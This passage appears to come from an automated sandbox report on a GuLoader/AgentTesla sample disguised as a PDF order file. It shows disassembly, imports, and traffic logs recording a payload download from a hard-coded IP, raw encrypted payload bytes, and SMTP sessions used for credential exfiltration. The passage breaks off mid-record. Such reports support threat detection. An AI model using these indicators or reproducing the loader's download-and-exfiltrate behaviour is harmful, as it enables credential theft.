                  Signature Issuer:CN="Murdock Hjernespinds Orddannelserne ", OU="Beauti Pilede ", E=Sheeting@Beredelse213.Syn, O=Stregens, L=La Haie-Traversaine, S=Pays de la Loire, C=FR
                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                  Error Number:-2146762487
                  Not Before, Not After
                  • 08/08/2022 04:49:24 07/08/2025 04:49:24
                  Subject Chain
                  • CN="Murdock Hjernespinds Orddannelserne ", OU="Beauti Pilede ", E=Sheeting@Beredelse213.Syn, O=Stregens, L=La Haie-Traversaine, S=Pays de la Loire, C=FR
                  Version:3
                  Thumbprint MD5:D9460ED9973B95EA8561C6C26E032EC9
                  Thumbprint SHA-1:64BCC2EC4F74B5FAADE9D48BAC0D710AFF171E4F
                  Thumbprint SHA-256:599928258A412563BC2620CAD41D51A4EDCF5C8E724A9DF73E6996094DA70D1E
                  Serial:F03396B055CCF99F
                  Instruction
                  sub esp, 000002D4h
                  push ebx
                  push esi
                  push edi
                  push 00000020h
                  pop edi
                  xor ebx, ebx
                  push 00008001h
                  mov dword ptr [esp+14h], ebx
                  mov dword ptr [esp+10h], 0040A2E0h
                  mov dword ptr [esp+1Ch], ebx
                  call dword ptr [004080A8h]
                  call dword ptr [004080A4h]
                  and eax, BFFFFFFFh
                  cmp ax, 00000006h
                  mov dword ptr [007A8A2Ch], eax
                  je 00007FE46088E853h
                  push ebx
                  call 00007FE460891AE9h
                  cmp eax, ebx
                  je 00007FE46088E849h
                  push 00000C00h
                  call eax
                  mov esi, 004082B0h
                  push esi
                  call 00007FE460891A63h
                  push esi
                  call dword ptr [00408150h]
                  lea esi, dword ptr [esi+eax+01h]
                  cmp byte ptr [esi], 00000000h
                  jne 00007FE46088E82Ch
                  push 0000000Ah
                  call 00007FE460891ABCh
                  push 00000008h
                  call 00007FE460891AB5h
                  push 00000006h
                  mov dword ptr [007A8A24h], eax
                  call 00007FE460891AA9h
                  cmp eax, ebx
                  je 00007FE46088E851h
                  push 0000001Eh
                  call eax
                  test eax, eax
                  je 00007FE46088E849h
                  or byte ptr [007A8A2Fh], 00000040h
                  push ebp
                  call dword ptr [00408044h]
                  push ebx
                  call dword ptr [004082A0h]
                  mov dword ptr [007A8AF8h], eax
                  push ebx
                  lea eax, dword ptr [esp+34h]
                  push 000002B4h
                  push eax
                  push ebx
                  push 0079FEE0h
                  call dword ptr [00408188h]
                  push 0040A2C8h
                  Programming Language:
                  • [EXP] VC++ 6.0 SP5 build 8804
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c40000x59b58.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x8fd600x1d20.data
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x63c80x6400False0.6766015625data6.504099201068482IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x80000x138e0x1400False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0xa0000x39eb380x600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .ndata0x3a90000x1b0000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x3c40000x59b580x59c00False0.4010598015320334data5.323726974368565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountry
                  RT_ICON0x3c43280x42028dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 0, next used block 0EnglishUnited States
                  RT_ICON0x4063500xe8bePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                  RT_ICON0x414c100x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295EnglishUnited States
                  RT_ICON0x418e380x25a8dataEnglishUnited States
                  RT_ICON0x41b3e00x10a8dataEnglishUnited States
                  RT_ICON0x41c4880x988dataEnglishUnited States
                  RT_ICON0x41ce100x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                  RT_DIALOG0x41d2780x100dataEnglishUnited States
                  RT_DIALOG0x41d3780x11cdataEnglishUnited States
                  RT_DIALOG0x41d4980xc4dataEnglishUnited States
                  RT_DIALOG0x41d5600x60dataEnglishUnited States
                  RT_GROUP_ICON0x41d5c00x68dataEnglishUnited States
                  RT_VERSION0x41d6280x1ecdataEnglishUnited States
                  RT_MANIFEST0x41d8180x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                  DLLImport
                  KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                  USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                  SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                  ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States
                  TimestampSource PortDest PortSource IPDest IP
                  Aug 8, 2022 13:30:13.447227001 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.466327906 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.466487885 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.467061996 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.487915039 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.487977028 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.488024950 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.488070965 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.488179922 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.488225937 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.488238096 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.507420063 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.507479906 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.507527113 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.507575035 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.507580042 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.507637024 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.507652998 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.507714987 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.507755041 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.507770061 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.507819891 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.507844925 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.507879972 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.507970095 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.508096933 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.527952909 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.528047085 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.528163910 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.528171062 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.528234005 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.528254032 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.528300047 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.528325081 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.528363943 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.528397083 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.528423071 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.528475046 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.528520107 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.528533936 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.528584957 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.528584957 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.528645039 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.528659105 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.528708935 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.528738976 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.528769016 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.528819084 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.528856993 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.528871059 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.528909922 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.528932095 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.528983116 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.529055119 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.529189110 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.548114061 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.548171043 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.548237085 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.548281908 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.548350096 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.548358917 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.548435926 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.548449039 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.548599958 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.548624039 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.548718929 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.548748016 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.548803091 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.548851013 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.548897982 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.548944950 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.548948050 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.549010038 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.549011946 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.549073935 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.549093008 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.549141884 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.549171925 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.549204111 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.549273014 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.549290895 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.549341917 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.549345016 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.549407005 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.549454927 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.549463987 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.549527884 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.549576044 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.549609900 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.549627066 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.549681902 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.549683094 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.549741983 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.549762964 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.549804926 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.549854994 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.549901962 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.549925089 CEST4979380192.168.11.20141.98.6.239
                  Aug 8, 2022 13:30:13.549962044 CEST8049793141.98.6.239192.168.11.20
                  Aug 8, 2022 13:30:13.549988031 CEST4979380192.168.11.20141.98.6.239
                  TimestampSource PortDest PortSource IPDest IP
                  Aug 8, 2022 13:30:23.502373934 CEST5503353192.168.11.201.1.1.1
                  Aug 8, 2022 13:30:24.407882929 CEST53550331.1.1.1192.168.11.20
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Aug 8, 2022 13:30:23.502373934 CEST192.168.11.201.1.1.10x87d9Standard query (0)mail.merian.com.arA (IP address)IN (0x0001)
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Aug 8, 2022 13:30:24.407882929 CEST1.1.1.1192.168.11.200x87d9No error (0)mail.merian.com.armerian.com.arCNAME (Canonical name)IN (0x0001)
                  Aug 8, 2022 13:30:24.407882929 CEST1.1.1.1192.168.11.200x87d9No error (0)merian.com.ar69.61.116.42A (IP address)IN (0x0001)
                  • 141.98.6.239
                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.11.2049793141.98.6.23980C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                  TimestampkBytes transferredDirectionData
                  Aug 8, 2022 13:30:13.467061996 CEST9013OUTGET /zeaveZtePRlRbWLesj75.dwp HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: 141.98.6.239
                  Cache-Control: no-cache
                  Aug 8, 2022 13:30:13.487915039 CEST9014INHTTP/1.1 200 OK
                  Content-Type: application/octet-stream
                  Last-Modified: Mon, 08 Aug 2022 04:51:52 GMT
                  Accept-Ranges: bytes
                  ETag: "4961fc93e2aad81:0"
                  Server: Microsoft-IIS/8.5
                  Date: Mon, 08 Aug 2022 11:30:13 GMT
                  Content-Length: 214592
                  Data Raw: ac 0f 7e 5b b5 c8 d1 9a c4 19 3d f2 64 06 8c 95 68 98 1a 05 df cc ce bc 94 17 e5 0d 00 77 6f 89 f7 4b 4c 9b c3 cc 5f 7e 32 b8 80 d7 5c d7 8f b2 aa 48 45 da 7b 6a 29 2a cf 1e 47 43 a3 ea ff f2 18 bd 6a fd a4 bf c7 f6 d2 e5 51 1a 9f e2 c9 09 f8 41 e4 dc 42 17 99 c7 c1 27 9c fd a1 c8 bd 33 d4 9c be f6 04 c7 81 d3 f8 f7 44 11 03 19 a7 ae 4e 19 b2 a5 0c 53 46 6a 4c a0 a4 36 81 29 19 01 c7 ac de 46 95 cb 79 aa 87 a9 d7 1a 1e a2 7b 05 a4 1f d7 f9 a8 c0 b9 a0 3e db b5 ff 41 d7 6e dd 07 90 5d d3 a0 bc 78 5d 28 62 2c f9 fa 6e 6b 46 35 78 fc 16 83 f0 a9 97 78 a1 7f 8f 63 a9 c8 d6 ca a3 6d cd 18 d1 44 a8 8f 20 d5 07 51 e7 fb fe f7 ee 96 3a c0 25 7b 29 cc d2 85 d5 9e b9 16 99 a2 df cb 95 5b 79 ba 93 72 e0 18 b1 19 0f b6 08 54 d6 e2 bc 15 1c 74 07 05 20 d4 a2 0c f7 4c b9 22 79 80 30 14 95 a2 6f a4 87 97 07 be 94 12 b6 be 5f 54 19 44 d4 de b8 4c 7f 38 48 a3 00 d6 c1 6a 29 b9 c4 c0 eb a2 5c 46 1e 9a 5e 6e 10 60 63 f9 62 08 fe 88 4c ab 8f 01 aa 96 aa 94 54 2c 76 08 e9 25 0e b9 00 35 58 2e f2 f9 29 ae a7 21 d6 5f 32 75 31 6d b9 be 4e 48 82 13 fa 06 e8 af f6 bc 2a 62 e6 0e 32 ff 78 b7 06 11 d1 71 18 95 62 d3 52 42 69 12 81 69 f6 e6 33 4d 31 7b a5 3b 6a 9d a1 17 04 65 1d a3 d2 0d f5 5a b7 6d 26 c5 61 30 a5 cb 9c d8 e5 b7 a6 38 8d a4 0b 0c 0a c4 75 ef 82 02 f8 3e 57 2e d7 14 20 c5 de ca 77 8f d6 48 73 92 c2 64 38 f4 be aa 7f a8 03 8e ad 72 62 71 8c d7 77 5f 90 ec be 78 2e 2c bf 75 2d f6 bd 7d b5 2b 19 37 19 69 e4 17 6e 94 25 0d 8a 62 2d 1a 04 8a 9c 03 db 8b 94 17 79 f4 1b e9 30 47 e6 97 ff 79 0b 32 4a 5f ef 80 37 29 80 40 0f 9b a9 a9 74 94 da b5 6d a3 ad 7f 7e 0b 05 db 17 52 29 5f 8a e0 44 87 4c f0 2b a1 c8 3d 10 8d f2 10 92 e7 7e 86 00 a9 46 d6 2c dd 27 b3 f3 27 34 cd 2b 5c ea c8 c2 bb 22 b0 6a c4 ea 44 58 32 78 92 76 ec 10 90 3f d5 03 ab 53 52 8f 21 fa 3c 57 e9 a5 27 f1 42 ad 3e 9c e9 2b 27 2f 43 3e 41 cd 3c 39 9d a4 03 35 bd d8 7d 79 c1 73 fc 41 b5 c2 22 df 2b ee f1 93 76 cd e1 92 1d 2c d7 08 e7 61 95 fe 1c 1f a6 23 56 97 e5 af 0f c9 2a a4 5f 2f 06 b0 1a fd 2b 34 d9 0f f6 8b 2d e7 70 73 1d 59 66 48 ee ee 39 49 91 78 5f 9a de d6 9c 28 d8 5c 7d ae 7c ae 85 f3 30 92 a4 9d e7 9d a7 16 02 54 5d 08 da 6e 45 01 ab aa a9 27 92 33 71 61 1b dd a5 bc 6f 6b 24 2c 47 a2 5b 0d 04 d4 5b c6 84 21 db 8e ee 0f 60 0c 95 68 d5 f0 fe 4f 60 51 d5 2f e9 c5 3f 18 eb 87 a5 37 40 3c fd 6f ab 2f db 88 78 f3 16 78 ce 1b a1 84 cc 1e 54 3f d1 1f 35 f2 f7 b4 dd 46 23 e9 36 6d ad d3 46 4a d1 fd e4 e4 ef ff d2 09 e1 c2 16 23 14 24 9c 7c 6e ad e4 8e 0d 19 be f8 3c 01 4e 60 17 87 f6 88 48 13 ad b0 f2 46 aa 55 e7 fa fe a7 bf d6 e0 dd ce 4a 1a 67 0a 37 08 6c 43 fc d7 42 10 8f 39 80 0b 9e ea aa c8 ba 2b 2a 9d 92 f4 2f c5 aa 30 86 f4 44 11 07 76 ab ae 4e 13 98 b6 3c 51 46 46 4c a0 a4 32 01 29 08 17 c2 98 7f 48 92 68 8e 66 8a 13 ce 5d d3 84 39 93 cc 40 f5 9e d1 af d9 ca a1 b7 b9 9e 0b bb 2b 51 0d b4 3f b6 84 a1 00 33 08 01 68 ca 8e 23 38 48 58 17 98 76 ad fd b5 8b 57 8a 64 8f 64 be 36 d7 b6 e4 75 c6 54 d7 51 56 d4 28 3d 72 5a e7 fc e6 09 ef ba 38 0b 27 52 cb c5 d0 a6 c4 9e 85 1f b1 b0 d7 cb 9f 71 79 ba 80 1c b9 1b 99 19 2f b6 0e 54 d6 f3 aa 1e 37 2f 07 02 17 2a a3 20 f7 54 b2 26 7e 96 ce 15 b9 a0 78 ab 87 90 1f 40 95 3e b4 95 fd 7c fa 46 fe cd b8 4c 75 12 5b 91 02 96 68 6a 29 a9 c3 c0 fb b3 4a 4d 35 91 5e 69 17 9e 62 d5 60 10 f5 98 4b bd 71 00 86 94 bd 9f 54 2b 6e fa b3 0a 0c dd 02 1e
                  Data Ascii: ~[=dhwoKL_~2\HE{j)*GCjQAB'3DNSFjL6)Fy{>An]x](b,nkF5xxcmD Q:%{)[yrTt L"y0o_TDL8Hj)\F^n`cbLT,v%5X.)!_2u1mNH*b2xqbRBii3M1{;jeZm&a08u>W. wHsd8rbqw_x.,u-}+7in%b-y0Gy2J_7)@tm~R)_DL+=~F,''4+\"jDX2xv?SR!<W'B>+'/C>A<95}ysA"+v,a#V*_/+4-psYfH9Ix_(\}|0T]nE'3qaok$,G[[!`hO`Q/?7@<o/xxT?5F#6mFJ#$|n<N`HFUJg7lCB9+*/0DvN<QFFL2)Hhf]9@+Q?3h#8HXvWdd6uTQV(=rZ8'Rqy/T7/* T&~x@>|FLu[hj)JM5^ib`KqT+n


                  TimestampSource PortDest PortSource IPDest IPCommands
                  Aug 8, 2022 13:30:24.723265886 CEST5874979669.61.116.42192.168.11.20220-linux58.webhosting-network-services.com ESMTP Exim 4.95 #2 Mon, 08 Aug 2022 07:30:24 -0400
                  220-We do not authorize the use of this system to transport unsolicited,
                  220 and/or bulk e-mail.
                  Aug 8, 2022 13:30:24.723635912 CEST49796587192.168.11.2069.61.116.42EHLO 141700
                  Aug 8, 2022 13:30:24.847345114 CEST5874979669.61.116.42192.168.11.20250-linux58.webhosting-network-services.com Hello 141700 [84.17.52.5]
                  250-SIZE 52428800
                  250-8BITMIME
                  250-PIPELINING
                  250-PIPE_CONNECT
                  250-STARTTLS
                  250 HELP
                  Aug 8, 2022 13:30:24.847774029 CEST49796587192.168.11.2069.61.116.42STARTTLS
                  Aug 8, 2022 13:30:24.973896980 CEST5874979669.61.116.42192.168.11.20220 TLS go ahead
                  Aug 8, 2022 13:30:34.274610043 CEST5874979769.61.116.42192.168.11.20220-linux58.webhosting-network-services.com ESMTP Exim 4.95 #2 Mon, 08 Aug 2022 07:30:33 -0400
                  220-We do not authorize the use of this system to transport unsolicited,
                  220 and/or bulk e-mail.
                  Aug 8, 2022 13:30:34.275027037 CEST49797587192.168.11.2069.61.116.42EHLO 141700
                  Aug 8, 2022 13:30:34.385174990 CEST5874979769.61.116.42192.168.11.20250-linux58.webhosting-network-services.com Hello 141700 [84.17.52.5]
                  250-SIZE 52428800
                  250-8BITMIME
                  250-PIPELINING
                  250-PIPE_CONNECT
                  250-STARTTLS
                  250 HELP
                  Aug 8, 2022 13:30:34.385531902 CEST49797587192.168.11.2069.61.116.42STARTTLS
                  Aug 8, 2022 13:30:34.496872902 CEST5874979769.61.116.42192.168.11.20220 TLS go ahead

                  Click to jump to process

                  Target ID:1
                  Start time:13:29:22
                  Start date:08/08/2022
                  Path:C:\Users\user\Desktop\Ordene 501527,pdf.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\Ordene 501527,pdf.exe"
                  Imagebase:0x400000
                  File size:596608 bytes
                  MD5 hash:5162B6782F86F1F24E8610544D159AE9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.39990186767.00000000037B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low

                  Target ID:8
                  Start time:13:30:00
                  Start date:08/08/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\Desktop\Ordene 501527,pdf.exe"
                  Imagebase:0x40000
                  File size:108664 bytes
                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Target ID:9
                  Start time:13:30:01
                  Start date:08/08/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\Ordene 501527,pdf.exe"
                  Imagebase:0xeb0000
                  File size:108664 bytes
                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000000.39838910204.0000000001300000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:moderate

                  Target ID:10
                  Start time:13:30:01
                  Start date:08/08/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7d9660000
                  File size:875008 bytes
                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:14
                  Start time:13:30:27
                  Start date:08/08/2022
